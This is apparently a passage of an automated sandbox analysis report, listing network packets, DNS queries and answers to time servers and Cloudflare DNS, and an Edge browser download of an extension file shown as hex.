                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:41.148652077 CET4434982792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:41.148734093 CET4434982792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:41.148806095 CET49827443192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:41.148916960 CET49827443192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:41.148935080 CET4434982792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:42.139596939 CET49844443192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:42.139641047 CET4434984492.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:42.139724016 CET49844443192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:42.139949083 CET49844443192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:42.139961004 CET4434984492.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:43.598339081 CET4434984492.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:43.598412991 CET49844443192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:43.603002071 CET49844443192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:43.603009939 CET4434984492.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:43.603244066 CET4434984492.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:43.604094028 CET49844443192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:43.647324085 CET4434984492.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:48.401177883 CET4434984492.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:48.401261091 CET4434984492.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:48.401385069 CET49844443192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:48.401540041 CET49844443192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:48.401561022 CET4434984492.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:49.389435053 CET49860443192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:49.389497042 CET4434986092.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:49.389559031 CET49860443192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:49.389668941 CET49860443192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:49.389683008 CET4434986092.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:51.286042929 CET4434986092.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:51.286127090 CET49860443192.168.2.1192.255.85.148

                                                                                                                                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:54:49.260854959 CET6149753192.168.2.111.1.1.1
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:54:49.492296934 CET53614971.1.1.1192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:18.640830994 CET5492753192.168.2.111.1.1.1
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:18.641028881 CET5691053192.168.2.111.1.1.1
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:18.641206980 CET5712453192.168.2.111.1.1.1
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:18.641376972 CET5138253192.168.2.111.1.1.1
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:18.642005920 CET5666753192.168.2.111.1.1.1
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:18.643083096 CET5244353192.168.2.111.1.1.1
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:18.643486023 CET6473853192.168.2.111.1.1.1
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:18.644414902 CET5233153192.168.2.111.1.1.1
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:18.777929068 CET53569101.1.1.1192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:18.778213978 CET53513821.1.1.1192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:18.780349970 CET53647381.1.1.1192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:18.781783104 CET53524431.1.1.1192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:18.879699945 CET53523311.1.1.1192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:19.295509100 CET53566671.1.1.1192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:19.514810085 CET53571241.1.1.1192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:19.515918016 CET52332123192.168.2.1194.198.159.10
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:19.515952110 CET52332123192.168.2.11216.239.35.0
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:19.516036987 CET52332123192.168.2.11129.6.15.28
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:19.516046047 CET52332123192.168.2.11129.250.35.250
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:19.516097069 CET52332123192.168.2.11162.159.200.123
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:19.516123056 CET52332123192.168.2.11129.134.25.123
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:19.516223907 CET52332123192.168.2.11194.58.203.20
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:20.598869085 CET12352332162.159.200.123192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:20.600673914 CET12352332129.250.35.250192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:20.604718924 CET12352332216.239.35.0192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:20.605464935 CET12352332129.134.25.123192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:20.607917070 CET12352332129.6.15.28192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:20.676151037 CET1235233294.198.159.10192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:20.694122076 CET12352332194.58.203.20192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:26.582014084 CET53501181.1.1.1192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:26.859196901 CET53497011.1.1.1192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:38.451152086 CET4915653192.168.2.111.1.1.1
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:38.451303005 CET5105253192.168.2.111.1.1.1
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:38.589859962 CET53510521.1.1.1192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:38.592483044 CET53491561.1.1.1192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:40.218100071 CET4997753192.168.2.111.1.1.1
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:40.218276024 CET6038053192.168.2.111.1.1.1
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:40.218631029 CET6551953192.168.2.111.1.1.1
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:40.218947887 CET6010253192.168.2.111.1.1.1
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:40.355413914 CET53603801.1.1.1192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:40.355633974 CET53655191.1.1.1192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:40.355921030 CET53601021.1.1.1192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:40.356323004 CET53499771.1.1.1192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:58.845293045 CET61341443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:59.158898115 CET61341443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:59.764386892 CET61341443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:59.948612928 CET44361341162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:59.948625088 CET44361341162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:59.950637102 CET44361341162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:59.950649977 CET44361341162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:59.954626083 CET44361341162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:59.956640005 CET61341443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:59.957014084 CET61341443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:59.967653036 CET61341443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:00.079824924 CET44361341162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:00.271908998 CET44361341162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:00.272038937 CET44361341162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:00.272048950 CET44361341162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:00.272059917 CET44361341162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:00.272636890 CET61341443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:00.272726059 CET61341443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:00.281681061 CET44361341162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:00.692972898 CET44361341162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:00.732919931 CET61341443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:18.594408035 CET61341443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:18.594660044 CET61341443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:18.909719944 CET44361341162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:18.911585093 CET44361341162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:18.913584948 CET44361341162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:18.914032936 CET61341443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:21.153304100 CET61341443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:21.153671980 CET61341443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:21.154925108 CET64379443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:21.467457056 CET64379443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:21.468272924 CET44361341162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:21.469285011 CET44361341162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:21.469844103 CET44361341162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:21.470033884 CET61341443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:22.076926947 CET64379443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:22.241441011 CET44364379162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:22.241533041 CET44364379162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:22.242069960 CET44364379162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:22.242173910 CET44364379162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:22.242624044 CET64379443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:22.244028091 CET64379443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:22.248584986 CET64379443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:22.392837048 CET44364379162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:22.557852030 CET44364379162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:22.558018923 CET44364379162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:22.558049917 CET44364379162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:22.558079004 CET44364379162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:22.558439970 CET64379443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:22.558515072 CET64379443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:22.563371897 CET44364379162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:22.564213037 CET44364379162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:22.564280987 CET44364379162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:22.564482927 CET64379443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:22.883038998 CET44364379162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:56:22.920705080 CET64379443192.168.2.11162.159.61.3

                                                                                                                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:54:49.260854959 CET192.168.2.111.1.1.10x4a8Standard query (0)msqMXFuLWSyMSfLTXxbcbTiF.msqMXFuLWSyMSfLTXxbcbTiFA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:18.640830994 CET192.168.2.111.1.1.10xea5eStandard query (0)time.windows.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:18.641028881 CET192.168.2.111.1.1.10xb857Standard query (0)time.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:18.641206980 CET192.168.2.111.1.1.10x4d75Standard query (0)gbg1.ntp.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:18.641376972 CET192.168.2.111.1.1.10xb251Standard query (0)time.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:18.642005920 CET192.168.2.111.1.1.10x8f30Standard query (0)x.ns.gin.ntt.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:18.643083096 CET192.168.2.111.1.1.10x8238Standard query (0)time-a-g.nist.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:18.643486023 CET192.168.2.111.1.1.10x5116Standard query (0)time.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:18.644414902 CET192.168.2.111.1.1.10xdfe1Standard query (0)ntp.time.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:38.451152086 CET192.168.2.111.1.1.10x44c8Standard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:38.451303005 CET192.168.2.111.1.1.10x9c26Standard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:40.218100071 CET192.168.2.111.1.1.10x6844Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:40.218276024 CET192.168.2.111.1.1.10x84adStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:40.218631029 CET192.168.2.111.1.1.10x79b1Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:40.218947887 CET192.168.2.111.1.1.10x46a5Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false

                                                                                                                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:54:49.492296934 CET1.1.1.1192.168.2.110x4a8Name error (3)msqMXFuLWSyMSfLTXxbcbTiF.msqMXFuLWSyMSfLTXxbcbTiFnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:18.777929068 CET1.1.1.1192.168.2.110xb857No error (0)time.cloudflare.com162.159.200.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:18.777929068 CET1.1.1.1192.168.2.110xb857No error (0)time.cloudflare.com162.159.200.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:18.778094053 CET1.1.1.1192.168.2.110xea5eNo error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:18.778213978 CET1.1.1.1192.168.2.110xb251No error (0)time.facebook.com129.134.25.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:18.780349970 CET1.1.1.1192.168.2.110x5116No error (0)time.google.com216.239.35.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:18.780349970 CET1.1.1.1192.168.2.110x5116No error (0)time.google.com216.239.35.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:18.780349970 CET1.1.1.1192.168.2.110x5116No error (0)time.google.com216.239.35.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:18.780349970 CET1.1.1.1192.168.2.110x5116No error (0)time.google.com216.239.35.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:18.781783104 CET1.1.1.1192.168.2.110x8238No error (0)time-a-g.nist.gov129.6.15.28A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:18.879699945 CET1.1.1.1192.168.2.110xdfe1No error (0)ntp.time.nl94.198.159.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:18.879699945 CET1.1.1.1192.168.2.110xdfe1No error (0)ntp.time.nl94.198.159.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:19.295509100 CET1.1.1.1192.168.2.110x8f30No error (0)x.ns.gin.ntt.net129.250.35.250A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:19.514810085 CET1.1.1.1192.168.2.110x4d75No error (0)gbg1.ntp.segbg1.ntp.netnod.seCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:19.514810085 CET1.1.1.1192.168.2.110x4d75No error (0)gbg1.ntp.netnod.se194.58.203.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:31.688407898 CET1.1.1.1192.168.2.110x3117No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:31.723547935 CET1.1.1.1192.168.2.110xcae1No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:31.723547935 CET1.1.1.1192.168.2.110xcae1No error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:38.589859962 CET1.1.1.1192.168.2.110x9c26No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:38.592483044 CET1.1.1.1192.168.2.110x44c8No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:38.592483044 CET1.1.1.1192.168.2.110x44c8No error (0)googlehosted.l.googleusercontent.com172.217.17.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:40.355413914 CET1.1.1.1192.168.2.110x84adNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:40.355633974 CET1.1.1.1192.168.2.110x79b1No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:40.355633974 CET1.1.1.1192.168.2.110x79b1No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:40.355921030 CET1.1.1.1192.168.2.110x46a5No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:40.356323004 CET1.1.1.1192.168.2.110x6844No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:40.356323004 CET1.1.1.1192.168.2.110x6844No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                                                        • clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                                        • chrome.cloudflare-dns.com

                                                                                                                                                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        0192.168.2.1149740172.217.17.654437804C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-18 13:55:40 UTC594OUTGET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                        2024-12-18 13:55:41 UTC562INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                        Content-Length: 154477
                                                                                                                                                                                                                                                                                                        X-GUploader-UploadID: AFiumC7Wp0_qmiHPrlwjr02gMprMIqXGA2DRBwe1UsIGXWfQQZWyqRscU0kaHdksSMtvk-U
                                                                                                                                                                                                                                                                                                        X-Goog-Hash: crc32c=F5qq4g==
                                                                                                                                                                                                                                                                                                        Server: UploadServer
                                                                                                                                                                                                                                                                                                        Date: Tue, 17 Dec 2024 15:58:14 GMT
                                                                                                                                                                                                                                                                                                        Expires: Wed, 17 Dec 2025 15:58:14 GMT
                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                        Age: 79046
                                                                                                                                                                                                                                                                                                        Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
                                                                                                                                                                                                                                                                                                        ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
                                                                                                                                                                                                                                                                                                        Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        2024-12-18 13:55:41 UTC828INData Raw: 43 72 32 34 03 00 00 00 f3 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                                                                                                                                                        Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
